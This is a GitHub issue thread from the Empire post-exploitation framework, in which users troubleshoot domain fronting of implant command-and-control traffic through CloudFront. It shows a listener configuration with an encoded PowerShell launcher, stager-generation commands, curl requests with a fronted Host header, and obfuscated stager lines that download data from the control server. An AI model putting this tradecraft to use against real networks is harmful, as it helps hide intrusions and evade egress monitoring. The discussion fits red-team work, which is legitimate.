### ISSUE TITLE
Can't make domain-fronting work

### ISSUE THREAD

**Issue by Ibrahimous** [EmpireProject/Empire#971]
## Empire Version
2.4 (dev branch)

## OS Information (Linux flavor, Python version)
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali2 (2018-01-11) x86_64 GNU/Linux

## Screenshot of error, embedded text output, or Pastebin link to the error

```(Empire: listeners) > info https_listener

https_listener Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        https_listener                   Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultProfile    True        /admin/login.php,/console/dashbo Default communication profile for the agent.
                                ard.asp,/news/today.jsp|
                                Mozilla/5.0 (Windows NT 6.1;
                                WOW64; Trident/7.0);|Host:d3XXXX
                                XXXXXXyj.cloudfront.net
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  Host              True        https://<frontable-domain>:443      Hostname/IP for staging.
  Port              True        443                              Port for the listener.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  CertPath          False       data                             Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        .bp%)kN+-vDF4U~;j2s=fqXl8}J?K{>@ Staging key for initial agent negotiation.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  Proxy             False       default                          Proxy to use for request (default, none, or other).
```
Then I do:
```
usestager windows/launcher_bat
set Listener https_listener
execute
```
I do see communication to <frontable-domain>:
![image](https://user-images.githubusercontent.com/3440845/35870271-94242526-0b61-11e8-9442-9eaf7fd8937d.png)

But nothing in the Empire console...

## Any additional information

curl -kv https://<frontable-domain> --header "Host: d3XXXXXXXXXXyj.cloudfront.net" works

Yes I have seen issue https://github.com/EmpireProject/Empire/issues/533
... and do not understand why it does not work like on: 
https://sowhatsecurity.co.uk/2017/08/16/domain-fronting-with-empire-cloudfront-and-lets-encrypt/

**Comment by xorrior** [comment]
@Ibrahimous what version of Windows is running on your target? What version of .NET? This will not work with powershell v2 and .NET v2

**Comment by Ibrahimous** [comment]
Windows 10:
```
Name                           Value
----                           -----
PSVersion                      5.1.16299.98
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.16299.98
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
```

![image](https://user-images.githubusercontent.com/3440845/35880326-eb7f5f04-0b7d-11e8-907a-5c041c514cb1.png)

**Comment by xorrior** [comment]
@Ibrahimous I'd take a look at the cache settings. I'm not sure if what's shown in that blog post is correct. You should model your settings to mirror what is show here: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks

**Comment by Strazzom** [comment]
Might it have something to do with the CertPath option? @xorrior Do you need to have the cert pair that the front domain is using? Because I have had issues where I was doing something similar, and I was getting `Invalid ciphertext received.`

I tracked it down in the source code, located at line 181 below:
https://github.com/EmpireProject/Empire/blob/master/lib/common/encryption.py

I believe the issue was that I was using the cert pair generated by Empire, rather than the one for the fronted domain, although I never solved the problem conclusively.

**Comment by Ibrahimous** [comment]
@xorrior @Strazzom Thanks a lot for your quick answers !
It might have something to do with caching, indeed, as for some reason in cloudfront I ticked "transmit cookies" but not "transmit headers", I'm going to test it again.
I don't think the problem is bound to wrong certificate, since I generated my own with https://github.com/certbot/certbot and have then a valid one.
I can private message you details of my cloudfront distribution, domain name, and the frontable domain I'm using if you wish.

**Comment by Ibrahimous** [comment]
Unfortunately, it doesn't work better :( I tracked down the powershell generated stager, and found that the following line fails (translated from french):
```
$DATA=$WC.DowNloADDAtA($SeR+$t)
Exception calling "DownloadData" with « 1 » argument(s) : "The remote server returned a 502 error : Bad gateway"
At caracter line 1 : 1
+ $DATA=$WC.DowNloADDAtA($SeR+$t)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
```

This is really strange as curl requests do work:
```
# curl -kI https://c<frontable-domain> --header "Host: d3XXXXXXXXXXyj.cloudfront.net" --header "Cookie: session=cQoxmZ8HuS72mq/eLYQ3gDdnKFE="
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 682
Connection: keep-alive
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Date: Wed, 07 Feb 2018 08:51:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 8da5def65f6d04fe2831a284a461df6b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: yelcuhBahFXjY2jg5wAM45l4E2PV88Gih8tjyLgHWbhjBHBB5Tym2Q==
```

**Comment by xorrior** [comment]
@Ibrahimous You don't have a proxy set in your stager right? Otherwise I'm not sure what would cause that.

**Comment by Ibrahimous** [comment]
@xorrior Thx but no, as from my Windows I'm able to use curl as well as from my Kali (where my listener listens):
![image](https://user-images.githubusercontent.com/3440845/35930072-45013666-0c31-11e8-8bf5-6396365166c9.png)

I have to debug that using Burp... proxy I just can't figure what .downloaddata does which returns a 502 error

**Comment by xorrior** [comment]
🤷‍♂️

**Comment by Ibrahimous** [comment]
@xorrior @Strazzom I figured it out (by using burp) !
2 problems there was:

1. The agent does NOT add the correct host, I see the following request leaving my computer through the proxy:
```
GET / HTTP/1.1
Cookie: session=jK3ft...z0=
Host: <frontable-domain> VS <my cloudfront distribution> !
Connection: close
```
This is abnormal since I do see the following in the agent code:
`$WC.HeAdeRs.AdD("Host","<my cloudfront distribution>");
`
That request implies with the understandable 502 Bad gateway response.

Besides, this is really strange since below mentionned POST requests DO have the Host Header value set to <my cloudfront distribution>.

If I replace <frontable-domain> by<my cloudfront distribution> by intercepting the request with Burp, I get a 200 return code.

2.  The cloudfront distribution must be configured to allow all kinds of requests, in particular POST requests. If not, you get a 403 Unauthorized response.

I'm going to look for the reason causing the issue 1.
